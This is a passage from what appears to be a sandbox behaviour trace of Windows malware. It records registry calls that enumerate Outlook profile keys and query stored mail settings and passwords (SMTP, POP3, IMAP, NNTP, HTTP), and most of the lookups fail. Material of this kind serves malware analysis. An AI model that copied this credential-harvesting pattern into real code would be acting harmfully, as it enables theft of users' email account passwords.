lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.150] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.151] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook", phkResult=0x1c4ef00 | out: phkResult=0x1c4ef00*=0x0) returned 0x2 [0249.151] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Outlook\\Profiles\\Outlook", phkResult=0x1c4ef00 | out: phkResult=0x1c4ef00*=0x0) returned 0x2 [0249.152] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook", phkResult=0x1c4ef00 | out: phkResult=0x1c4ef00*=0x0) returned 0x2 [0249.152] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook", phkResult=0x1c4ef00 | out: phkResult=0x1c4ef00*=0x94c) returned 0x0 [0249.153] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegEnumKeyExA") returned 0x7ff976f825d0 [0249.153] RegEnumKeyExA (in: hKey=0x94c, dwIndex=0x0, lpName=0x1c4ef10, lpcchName=0x1c4f738, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="03fea8ae12202041b643a9691e5b323c", lpcchName=0x1c4f738, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.153] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0249.153] LocalAlloc (uFlags=0x40, uBytes=0xd7) returned 0x5d67060 [0249.153] wsprintfA (in: param_1=0x5d67060, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\03fea8ae12202041b643a9691e5b323c") returned 88 [0249.153] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\03fea8ae12202041b643a9691e5b323c", phkResult=0x1c4e6a0 | out: phkResult=0x1c4e6a0*=0x95c) returned 0x0 [0249.153] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x0, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.153] RegCloseKey (hKey=0x95c) returned 0x0 [0249.153] LocalFree (hMem=0x5d67060) returned 0x0 [0249.153] RegEnumKeyExA (in: hKey=0x94c, dwIndex=0x1, lpName=0x1c4ef10, lpcchName=0x1c4f738, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="09917dd29831004f89474b112e58e0ab", lpcchName=0x1c4f738, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.154] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0249.154] LocalAlloc (uFlags=0x40, uBytes=0xd7) returned 0x5d68100 [0249.154] wsprintfA (in: param_1=0x5d68100, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab") returned 88 [0249.154] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.154] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.154] RegCloseKey (hKey=0x95c) returned 0x0 [0249.154] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.154] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.154] RegCloseKey (hKey=0x95c) returned 0x0 [0249.154] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.154] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.154] RegCloseKey (hKey=0x95c) returned 0x0 [0249.154] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.154] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.154] RegCloseKey (hKey=0x95c) returned 0x0 [0249.154] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.154] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.154] RegCloseKey (hKey=0x95c) returned 0x0 [0249.154] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.154] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.154] RegCloseKey (hKey=0x95c) returned 0x0 [0249.154] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.154] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.154] RegCloseKey (hKey=0x95c) returned 0x0 [0249.154] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.155] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.155] RegCloseKey (hKey=0x95c) returned 0x0 [0249.155] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.155] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.155] RegCloseKey (hKey=0x95c) returned 0x0 [0249.155] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.155] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.155] RegCloseKey (hKey=0x95c) returned 0x0 [0249.155] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.155] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.155] RegCloseKey (hKey=0x95c) returned 0x0 [0249.155] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.155] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.155] RegCloseKey (hKey=0x95c) returned 0x0 [0249.155] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.155] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.155] RegCloseKey (hKey=0x95c) returned 0x0 [0249.155] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.155] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.155] RegCloseKey (hKey=0x95c) returned 0x0 [0249.155] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.155] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.155] RegCloseKey (hKey=0x95c) returned 0x0 [0249.155] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.155] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.155] RegCloseKey (hKey=0x95c) returned 0x0 [0249.156] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.156] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.156] RegCloseKey (hKey=0x95c) returned 0x0 [0249.156] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.156] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.156] RegCloseKey (hKey=0x95c) returned 0x0 [0249.156] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.156] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.156] RegCloseKey (hKey=0x95c) returned 0x0 [0249.156] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.156] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.156] RegCloseKey (hKey=0x95c) returned 0x0 [0249.156] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.156] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.156] RegCloseKey (hKey=0x95c) returned 0x0 [0249.156] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.156] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.156] RegCloseKey (hKey=0x95c) returned 0x0 [0249.156] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.156] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.156] RegCloseKey (hKey=0x95c) returned 0x0 [0249.157] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.157] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.157] RegCloseKey (hKey=0x95c) returned 0x0 [0249.157] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.157] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.157] RegCloseKey (hKey=0x95c) returned 0x0 [0249.157] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.157] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.157] RegCloseKey (hKey=0x95c) returned 0x0 [0249.157] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.157] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.157] RegCloseKey (hKey=0x95c) returned 0x0 [0249.157] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.157] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.157] RegCloseKey (hKey=0x95c) returned 0x0 [0249.157] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.157] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.157] RegCloseKey (hKey=0x95c) returned 0x0 [0249.157] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.157] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.158] RegCloseKey (hKey=0x95c) returned 0x0 [0249.158] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.158] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.158] RegCloseKey (hKey=0x95c) returned 0x0 [0249.158] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.158] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.158] RegCloseKey (hKey=0x95c) returned 0x0 [0249.158] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.158] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.158] RegCloseKey (hKey=0x95c) returned 0x0 [0249.158] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.158] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.158] RegCloseKey (hKey=0x95c) returned 0x0 [0249.158] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.158] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.158] RegCloseKey (hKey=0x95c) returned 0x0 [0249.158] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.158] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.158] RegCloseKey (hKey=0x95c) returned 0x0 [0249.158] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.159] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.159] RegCloseKey (hKey=0x95c) returned 0x0 [0249.159] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.159] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.159] RegCloseKey (hKey=0x95c) returned 0x0 [0249.159] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 